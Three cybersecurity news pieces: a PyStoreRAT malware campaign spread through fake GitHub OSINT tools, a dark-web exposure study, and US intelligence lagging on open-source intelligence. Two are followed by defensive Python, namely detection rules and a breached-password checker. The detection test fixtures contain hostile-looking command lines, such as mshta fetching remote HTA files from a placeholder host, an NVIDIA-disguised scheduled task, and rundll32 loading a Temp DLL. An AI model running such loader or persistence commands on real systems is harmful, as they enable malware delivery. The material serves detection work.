
Fake GitHub OSINT Tools Spread PyStoreRAT Malware

 

Attackers are using GitHub to distribute a novel JavaScript-based RAT called PyStoreRAT, disguising it as widely used OSINT, GPT, and security utilities aimed at developers and analysts. The campaign relies on small Python or JavaScript loader snippets hosted in fake GitHub repositories; these silently fetch and execute remote HTML Application (HTA) files via mshta.exe, kicking off a multi-stage infection chain.

PyStoreRAT is described as a modular, multi-stage implant that can load and execute a wide range of payload formats, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules, making it highly versatile once a foothold has been established. One of the most prominent follow-on payloads is the Rhadamanthys information stealer, which specializes in exfiltrating sensitive data such as credentials and financial information. The loaders arrive embedded in repositories branded as OSINT frameworks, DeFi trading bots, GPT wrappers, or security tools; many of them do little beyond displaying static menus or other placeholder behavior to appear legitimate.

The campaign is believed to have started around mid-June 2025, with the attackers publishing new repositories at a steady pace and artificially inflating stars and forks by promoting them on YouTube, X, and other platforms. Once these tools gained traction and reached GitHub's trending lists, the threat actors slipped in malicious "maintenance" commits during October and November, quietly swapping or augmenting the code to insert the loader logic. This abuse of GitHub's trust model and popularity signals echoes tactics previously seen in the Stargazers Ghost Network.

The loader then retrieves a remote HTA, which installs PyStoreRAT. The implant profiles the system, checks whether it is running with administrator privileges, and searches for cryptocurrency wallet artifacts from services such as Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. It also enumerates installed anti-virus software, looking for strings such as "Falcon" and "Reason" (associated with CrowdStrike and Cybereason/ReasonLabs respectively), and appears to modify the path from which mshta.exe is executed in order to evade detection.

Persistence is achieved with a scheduled task disguised as an NVIDIA self-update. The RAT then communicates with a remote server for commands, which include, but are not limited to: downloading and executing EXE payloads, delivering Rhadamanthys, unpacking archives, loading malicious DLLs via rundll32.exe, unpacking MSI packages, executing PowerShell payloads inside a suspended process, spawning additional mshta.exe instances, and propagating via removable storage devices by planting weaponized LNK files.

It can also delete its own scheduled tasks, which is seen as a way of making reverse engineering even harder. The Python-based loaders contain Russian-language artifacts and coding conventions that point to a probable Eastern European adversary. Researchers describe PyStoreRAT as part of a shift toward adaptable, script-based implants that evade common detections in a targeted environment until very late in the intrusion.
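The chain described above (a Python or JavaScript loader spawning mshta.exe with a remote URL, mshta.exe run from a non-standard path, an NVIDIA-branded scheduled task, and rundll32.exe loading a DLL from a user-writable directory) leaves a recognisable trail in process-creation telemetry. The following Python is an added example, not code from the researchers or from the campaign: it runs a handful of detection rules over constructed events carrying a minimal subset of Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage). It matches mshta on the PE's OriginalFileName so that a copied or renamed binary is still caught, which assumes a log source that records that field (Sysmon does; the plain Windows 4688 event does not). The task name, domain (example.invalid), user name and file paths in the sample events are all invented for the example and are not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Where a legitimate mshta.exe lives; anything else is a copied or relocated binary.
MSHTA_STANDARD_PATHS = (r"c:\windows\system32\mshta.exe", r"c:\windows\syswow64\mshta.exe")
SCRIPT_HOSTS = ("python.exe", "pythonw.exe", "node.exe", "wscript.exe", "cscript.exe")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
NVIDIA_DIR_RE = re.compile(r'^"?c:\\program files( \(x86\))?\\nvidia', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Constructed subset of Sysmon Event ID 1 (process creation) fields."""
    image: str
    original_file_name: str   # from the PE version resource; survives renaming
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_mshta(ev: ProcEvent) -> bool:
    # Match on OriginalFileName so a copied or renamed mshta.exe is still recognised.
    return ev.original_file_name.upper() == "MSHTA.EXE" or basename(ev.image) == "mshta.exe"


def _schtasks_arg(cmd: str, flag: str) -> str:
    """Return the value of a schtasks flag such as /tn or /tr (quoted or bare)."""
    m = re.search(rf'{re.escape(flag)}\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def check_event(ev: ProcEvent) -> list[str]:
    findings: list[str] = []
    image, cmd = ev.image.lower(), ev.command_line.lower()

    if is_mshta(ev):
        if image not in MSHTA_STANDARD_PATHS:
            findings.append("mshta_nonstandard_path")
        if URL_RE.search(cmd):
            findings.append("mshta_remote_hta")
        if basename(ev.parent_image) in SCRIPT_HOSTS:
            findings.append("mshta_spawned_by_script_host")

    if basename(ev.image) == "schtasks.exe" and "/create" in cmd:
        name = _schtasks_arg(ev.command_line, "/tn")
        action = _schtasks_arg(ev.command_line, "/tr")
        # An NVIDIA-branded task whose action does not live under the vendor's own directory.
        if "nvidia" in name.lower() and not NVIDIA_DIR_RE.match(action):
            findings.append("task_masquerading_as_nvidia")
        if "mshta" in action.lower() and URL_RE.search(action):
            findings.append("task_runs_remote_hta")

    if basename(ev.image) == "rundll32.exe" and any(p in cmd for p in USER_WRITABLE):
        findings.append("rundll32_user_writable_dll")

    return findings


def analyze(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings, for every event that triggered at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := check_event(ev))}


# Constructed sample telemetry: the loader chain, a benign mshta use, and a benign task.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", "MSHTA.EXE",
              "mshta.exe https://example.invalid/osint-tool/update.hta",
              r"C:\Users\alice\AppData\Local\Programs\Python\Python313\python.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Roaming\nv\nvhost.exe", "MSHTA.EXE",
              "nvhost.exe https://example.invalid/stage2.hta",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              'schtasks.exe /create /tn "NVIDIA\\NvDriverUpdate" '
              '/tr "mshta.exe https://example.invalid/s.hta" /sc minute /mo 30',
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", "MSHTA.EXE",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", "RUNDLL32.EXE",
              r"rundll32.exe C:\Users\alice\AppData\Local\Temp\nvupd.dll,Start",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks.exe /create /tn "NightlyBackup" /tr "C:\Tools\backup.exe" /sc daily',
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, hits in analyze(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}  <- {SAMPLE_EVENTS[idx].command_line}")
```

The benign events (a local HTA launched from Explorer, a backup task pointing at a fixed path) produce no findings, which is the point of keying the rules on remote URLs, non-standard paths and parent script hosts rather than on the bare presence of mshta.exe or schtasks.exe.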

Dark Web Exposure Increases Risk of Cyber Attacks, Study Finds

 



A new research study has found that companies mentioned on the dark web are significantly more likely to suffer a cyberattack. Searchlight Cyber, in collaboration with Marsh McLennan's Cyber Risk Intelligence Center, analyzed more than 9,000 organizations and found a strong correlation between dark web exposure and security breaches, underlining the need for businesses to track their exposure and tighten their security controls.


How the Dark Web Poses a Threat to Businesses  

The dark web is a hidden part of the internet where cybercriminals operate anonymously. It is commonly used for illegal activities, including the sale of stolen data such as passwords, financial records, and personal information. Many businesses are unaware that their sensitive data is already circulating on the dark web, making them prime targets for cyberattacks.

The study reports a 3.7% breach rate over four years among companies with any kind of dark web exposure. Put simply, once an organization's information appears in underground marketplaces, hacking forums, or leaked databases, its likelihood of a security breach rises substantially compared with organizations that have no such exposure.

The researchers identified several routes by which a company's information can reach the dark web, each of which raises the likelihood of a cyberattack:

1. Exposed Employee Credentials  

If employee login credentials (e.g., email and password) are leaked, the likelihood of a breach increases 2.56-fold. Attackers use such credentials to gain unauthorized access to internal systems.


2. References on Dark Web Marketplaces  

Being mentioned on an underground trading platform increases a company's chance of being breached 2.41-fold. Typically, stolen information is sold on to other attackers, who then make use of it.

3. Company Network Tied to Dark Web

If an organization's network is observed generating dark web activity, whether intentional or accidental, breaches occur 2.11 times more frequently.

4. Paste Sites Data Leaks 

Paste sites are commonly used by hackers to share data stolen from an organization. If a company's data is posted on such a site, the likelihood of a breach rises by 88%.

5. Public Exposure through OSINT  

Sometimes a company's information is exposed publicly because of a misconfigured environment or insecure data storage. If a firm appears in OSINT reports of this kind, its risk increases 2.05-fold.

The research also showed that companies appearing in five or more of these risk categories were 77% more likely to suffer a cyberattack than companies appearing in none.


How Companies Can Protect Themselves

Cyberattacks are increasing by the day, so businesses have to take proactive steps to secure their sensitive data. Experts recommend the following actions:


  •  Check the Dark Web Daily

Businesses should use monitoring that scans the dark web for their data and respond immediately when company data is found.


  •  Strong Password Policies 

Employees must be required to use strong passwords and to enable MFA, so that leaked credentials alone do not give attackers access.


  •  Frequently Update Security Systems

Software updates and system patches keep cybercriminals from exploiting vulnerabilities in outdated technology.


  •  Train Employees on Cybersecurity Risks 

  Human error is one of the biggest causes of cyber breaches. Educating staff on how to identify phishing scams and suspicious activities can significantly reduce security threats.
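The credential-exposure and password-policy advice above can be put into practice at password-change time by rejecting any password that already appears in a breach corpus. The following Python is an added example, not code from the study or from Searchlight Cyber: it implements the k-anonymity range query popularized by Have I Been Pwned's Pwned Passwords API, in which the client sends only the first five hex characters of the password's SHA-1 and compares the returned hash suffixes locally, so the checking service never learns the password or its full hash. The breach corpus, the candidate passwords and the RangeServer class (which stands in for the remote service so the example runs offline) are all constructed for this example.

```python
import hashlib
from collections import defaultdict

# Constructed breach corpus: plaintext -> number of breach records it appeared in.
# Shown in the clear only so the example is self-contained; a real corpus holds hashes.
LEAKED_CORPUS = {"Password123": 4200, "Winter2024!": 37, "letmein": 9100}


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


class RangeServer:
    """Stand-in for the remote lookup service. It only ever receives a
    5-character hash prefix, so it cannot tell which password was checked."""

    def __init__(self, corpus: dict[str, int]):
        self._ranges: dict[str, list[str]] = defaultdict(list)
        for pw, count in corpus.items():
            h = sha1_hex(pw)
            self._ranges[h[:5]].append(f"{h[5:]}:{count}")
        self.queries: list[str] = []   # everything the server has observed

    def lookup(self, prefix: str) -> str:
        if len(prefix) != 5:
            raise ValueError("range queries take exactly 5 hex characters")
        self.queries.append(prefix)
        return "\n".join(self._ranges.get(prefix, []))


def breach_count(server: RangeServer, password: str) -> int:
    """Return how many breach records the password appears in (0 if none).
    Only the prefix leaves the client; the suffix comparison happens locally."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in server.lookup(prefix).splitlines():
        leaked_suffix, count = line.split(":")
        if leaked_suffix == suffix:
            return int(count)
    return 0


def vet_new_password(server: RangeServer, password: str, min_len: int = 12) -> list[str]:
    """Policy check at password-change time: reject short or breached passwords.
    Returns the list of reasons for rejection; an empty list means accepted."""
    reasons = []
    if len(password) < min_len:
        reasons.append(f"shorter than {min_len} characters")
    n = breach_count(server, password)
    if n:
        reasons.append(f"seen in {n} breach records")
    return reasons


if __name__ == "__main__":
    srv = RangeServer(LEAKED_CORPUS)
    for candidate in ("Password123", "Winter2024!", "orbit-lantern-quartz-87"):
        print(candidate, "->", vet_new_password(srv, candidate) or "accepted")
    print("server saw only prefixes:", srv.queries)
```

The same check can be run against the real Pwned Passwords range endpoint by replacing RangeServer.lookup with an HTTPS GET of the five-character prefix; the parsing and comparison logic stays identical.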


Why Dark Web Awareness is Crucial

According to Ben Jones, CEO of Searchlight Cyber, companies must be aware of their dark web exposure. Hackers, he explained, plan cyberattacks in underground forums and marketplaces and use leaked credentials to gain access to company systems.

By monitoring their exposure, strengthening their security policies, and educating employees, businesses can minimize their risk and stay one step ahead of cybercriminals. Protecting sensitive information before an attack happens costs far less than recovering from a breach.


US Spies Lag Rivals in Gathering Data That is Concealed From Plain Sight


As alarms began to sound globally about the spread of the coronavirus in China, officials in Washington grew concerned about the threat the virus might pose to America, and turned to U.S. intelligence for insight.

However, according to a recent congressional review of classified reports from December 2019 and January 2020, the most prevalent early warnings did not come from spies or intercepts. Instead, officials relied on citizen journalists, public reporting, and diplomatic cables, as well as analysis from medical professionals: all examples of so-called open-source intelligence (OSINT).

Predicting the next potential pandemic or the next government to fall will require better utilization of open-source materials, the review noted. 

In a review conducted by Democrats on the House Intelligence Committee, the authors wrote, “There is little indication that the Intelligence Community’s exquisite collection capabilities were generating information that was valuable to policymakers.” 

This echoes what numerous current and former intelligence officials are increasingly warning: as adversaries like China boost their efforts, the $90 billion U.S. spy apparatus is falling behind because it has not embraced open-source intelligence collection.

Traditional Intelligence is Still Prevalent 

While open-source intelligence has become an important discipline in recent years, this does not diminish the relevance of conventional intelligence. Spy agencies have unique powers to penetrate global communications and cultivate agents. For instance, when the Biden administration made public the intelligence conclusions indicating that Russian President Vladimir Putin intended to invade Ukraine, it scored a high-profile success.

Nonetheless, officials and experts have raised concerns that the U.S. has not invested enough people or money in analyzing publicly available data, and has not made effective use of advanced technologies to extract critical insights from it.

Commercial satellite imagery, social media, and other web data have increased the ability of private enterprises and independent analysts to disclose state secrets. And there are rising concerns in Washington about Beijing's influence over popular apps like TikTok, given that Beijing is known to have stolen or gained control over vast amounts of data on Americans.

"Open source is really a bellwether for whether the intelligence community can protect the country […] We collectively as a nation aren't preparing a defense for the ammunition that our adversaries are stockpiling," said Kristin Wood, a former senior official at the CIA and now chief executive of the Grist Mill Exchange, a commercial data platform.

Barriers Concerning Open-Source 

Intelligence agencies have identified several barriers to open-source intelligence. Some are technological: for instance, officers working on classified networks frequently have difficulty reaching the unclassified internet or open data sources. Concerns about civil liberties and upholding First Amendment rights are also a factor.

Some experts also question whether agencies are held back by a reflexive belief that top-secret information is inherently more valuable.

Rep. Jim Himes, a Connecticut Democrat and longtime Intelligence Committee member, said he believed there needed to be “some cultural change inside places like the CIA where people are doing what they’re doing for the excitement of stealing critical secrets as opposed to reviewing social media pages.”

Open-Source Capability of the U.S. 

According to Frederick Kagan, a senior fellow at the American Enterprise Institute who oversees the production of those reports, “There is a lot of open-source capability that the U.S. intelligence community can pretty much rely on to be there […] What it needs to do is figure out how to leverage that ecosystem instead of trying to buy it.”

Most of the 18 U.S. intelligence agencies run open-source programs, ranging from the CIA’s Open Source Enterprise to a 10-person program in the Department of Homeland Security’s intelligence arm.

However, top officials acknowledge a lack of consistency across those programs in how they analyze open-source information and how they use and share it. Avril Haines, the U.S. director of national intelligence, has said, “We’re not paying enough attention to each other and so we’re not learning the lessons that different parts of the (intelligence community) are learning, and we’re not scaling solutions, and we’re not taking advantage of some of the outside expertise and information and work that could be taken advantage of.”